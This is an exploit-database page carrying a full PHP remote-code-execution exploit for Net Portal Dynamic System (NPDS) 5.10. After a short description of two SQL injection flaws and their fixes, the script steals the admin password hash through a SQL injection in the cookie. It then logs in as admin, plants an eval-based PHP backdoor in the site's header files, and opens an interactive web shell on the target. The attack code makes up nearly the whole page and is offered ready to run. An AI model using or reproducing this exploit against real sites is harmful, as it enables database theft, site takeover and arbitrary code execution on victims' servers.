0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution (2)
[==================================================================
Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution (2)
==================================================================
<?php
/*---------------------------------------------------------*\
NPDS <= 5.10 - Remote Code Execution exploit
[|Description:|]
Security holes were found in NPDS 5.10.
N°1: Sql Injection in cookies (File Mainfile.php lines 655 to 691).
No check is carried out on nicknames or Id which can allow an attacker
to modify a SQL request so as to obtain data.
N°2: SQL Injection due to a bad use of "X_FORWARDED_FOR" (file Mainfile.php lines 88 to 110).
NPDS uses the HTTP header "X_FORWARDED_FOR" which normally contains the IP adress
of a person using a non anonymous proxy. This Ip address is used in a SQL resquest without appropriate
filtering, and an attacker can define "X_FORWARDED_FOR" insering malicious SQL code.
[|Solution:|]
N°1: File mainfile.php, add after line 665:
$cookie[0] = inval($cookie[0);
$cookie[1] = addslashes($cookie[1]);
$cookie[2] = addslashes($cookie[2]);
N°2: Replace fonction "getip" (mainfile.php) by:
function getip() {
return $_SERVER['REMOTE_ADDR'];
}
Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)
for AeroX (AeroXteam.fr)
(C)opyleft 2007
Gr33tz: Darkfig, Spamm, Math?, Barma, NeoMorphS, Snake91, Kad, Nitr0, BlastKiller, Alkino And everybody from #aerox@irc.epiknet.org
\*---------------------------------------------------------*/
if(count($argv) == 5) {
head();
echo "\r\n[+] Connection... ";
$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
########
echo "OK\r\n";
echo "[+] Logging to account... ";
$reqlogin = "POST ".$argv[2]."user.php HTTP/1.1\r\n";
$reqlogin .= "Host: ".$argv[1]."\r\n";
$reqlogin .= "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n";
$reqlogin .= "Accept: */*\r\n";
$reqlogin .= "Connection: close\r\n";
$reqlogin .= "Referer: http://".$argv[1]."".$argv[2]."user.php\r\n";
$reqlogin .= "Content-Type: application/x-www-form-urlencoded\r\n";
$reqlogin .= "Content-Length: ".strlen("uname=".$argv[3]."&pass=".$argv[4]."&op=login")."\r\n\r\n";
$reqlogin .= "uname=".$argv[3]."&pass=".$argv[4]."&op=login";
fwrite($sock, $reqlogin);
unset($reqlogin);
$pagelogin = '';
while(!feof($sock)) {
$pagelogin .= fgets($sock);
}
fclose($sock);
preg_match("`Set-Cookie: user=(.*?);`", $pagelogin, $cookie);
if(empty($cookie[1])) {
die("Failed\r\n\r\nCould not login as ".$argv[3]." !");
} else {
echo "OK\r\n";
}
if(($decoded = base64_decode($cookie[1])) !== false) {
$exploded = explode(':', $decoded);
$exploded[0] = "' UNION SELECT CONCAT(0x4055534552, aid, 0x5553455240, 0x204050415353, pwd, 0x5041535340) FROM authors WHERE radminsuper=1 LIMIT 0,1 /*";
$exploded[8] = 1;
$cookieuser = base64_encode(implode(':', $exploded));
}
########
echo "[+] Getting admin password... ";
$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
$reqpass = "GET ".$argv[2]."index.php?op=edito HTTP/1.1\r\n";
$reqpass .= "Host: ".$argv[1]."\r\n";
$reqpass .= "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n";
$reqpass .= "Accept: */*\r\n";
$reqpass .= "Connection: close\r\n";
$reqpass .= "Cookie: user=".$cookieuser."; user_language=french\r\n\r\n";
fwrite($sock, $reqpass);
unset($reqpass);
$pagepass = '';
while(!feof($sock)) {
$pagepass .= fgets($sock);
}
fclose($sock);
preg_match("`@USER(.*?)USER@ @PASS(.*?)PASS@`", $pagepass, $result);
unset($pagepass);
if(empty($result[1]) || empty($result[2])) {
fclose($sock);
die("Failed !\r\n\r\nMaybe not vulnerable ?!");
} else {
echo "OK\r\n";
}
########
echo "[+] Login to admin & injecting PHP code... ";
$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
$cookieadmin = base64_encode($result[1].':'.md5($result[2]));
$reqshell = "POST ".$argv[2]."admin.php?op=ConfigFiles_save HTTP/1.1\r\n";
$reqshell .= "Host: ".$argv[1]."\r\n";
$reqshell .= "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n";
$reqshell .= "Accept: */*\r\n";
$reqshell .= "Connection: close\r\n";
$reqshell .= "Cookie: admin=".$cookieadmin."; user_language=french\r\n";
$reqshell .= "Referer: http://".$argv[1]."".$argv[2]."admin.php\r\n";
$reqshell .= "Content-Type: application/x-www-form-urlencoded\r\n";
$reqshell .= "Content-Length: ".strlen("Xtxt=".urlencode("<?php\r\n include(\"modules/aide-contextuelle/AC-header.js\");\r\n if(!empty(\$_SERVER['PHPSHELL'])){eval(\$_SERVER['PHPSHELL']);die();}\r\n?>")."&Xfiles=header_head&confirm=Sauver+les+modifications")."\r\n\r\n";
$reqshell .= "Xtxt=".urlencode("<?php\r\n include_once(\"modules/ipban/ban.php\");\r\n if(!empty(\$_SERVER['HTTP_PHPCODE'])){eval(urldecode(base64_decode(\$_SERVER['HTTP_PHPCODE'])));die();}\r\n?>")."&Xfiles=header_before&confirm=Sauver+les+modifications";
fwrite($sock, $reqshell);
unset($reqshell);
$pageshell = '';
while(!feof($sock)) {
$pageshell .= fgets($sock);
}
fclose($sock);
if(preg_match('`location: admin\.php\?op=ConfigFiles`', $pageshell)) { $ok = 1; }
unset($pageshell);
if(!$ok) {
die("Failed\r\n\r\nUnable to write PHP Code");
} else {
echo "OK\r\n\r\n";
}
while(1) {
unset($exec);
echo "[PhpShell@".$argv[1]."]$ ";
$input = trim(fgets(STDIN));
if($input == 'quit' || $input == 'exit') {
break;
}
$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
if (!$sock) {
die("\r\nCould not connect to ".$argv[1]." on the port 80 !");
}
$req = "GET ".$argv[2]."index.php?op=edito HTTP/1.1\r\n";
$req .= "Host: ".$argv[1]."\r\n";
$req .= "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n";
$req .= "Accept: */*\r\n";
$req .= "PHPCODE: ".urldecode(base64_encode($input))."\r\n";
$req .= "Connection: close\r\n\r\n";
fwrite($sock, $req);
unset($req);
$headers = 0;
while(!feof($sock)) {
$buffer = fgets($sock);
if(!$headers) {
if($buffer == "\r\n") { $headers = 1; }
} else {
$exec .= $buffer;
}
}
echo $exec."\r\n\r\n";
}
} else {
usage();
}
function usage() {
echo "+------------------------------------------------------+\r\n";
echo "| NPDS <= 5.10 Remote Code Execution exploit |\r\n";
echo "| By Gu1ll4um3r0m41n for AeroX |\r\n";
echo "| You need a user account !! |\r\n";
echo "| Usage: php exploit.php site.com /path/ user pass |\r\n";
echo "+------------------------------------------------------+\r\n";
}
function head() {
echo "+----------------------------------------------+\r\n";
echo "| MPDS <= 5.10 Remote Code Execution exploit |\r\n";
echo "| By Gu1ll4um3r0m41n for AeroX |\r\n";
echo "+----------------------------------------------+\r\n\r\n";
}
?>
# 0day.today [2024-12-27] #